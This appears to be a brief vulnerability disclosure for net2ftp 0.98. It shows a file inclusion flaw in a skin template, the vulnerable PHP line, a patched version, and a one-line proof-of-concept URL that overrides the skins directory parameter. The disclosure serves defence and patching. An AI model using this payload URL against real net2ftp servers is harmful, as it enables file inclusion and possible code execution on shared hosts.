net2ftp Stable 0.98 Remote / Local File Inclusion

`net2ftp is web based ftp client used by many web shared hosting  
////////////////////////////////////////////////////////////////////  
Vuln is in file skins/mobile/admin1.template.php:  
  
<?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>  
  
///////////////////////////////////////////////////////////////////  
Pathed Version:  
<?php  
defined("NET2FTP") or die("Direct access to this location is not allowed.");  
require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php");  
?>  
  
//////////////////////////////////////////////////////////////////  
POC:  
http://server/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil  
  
`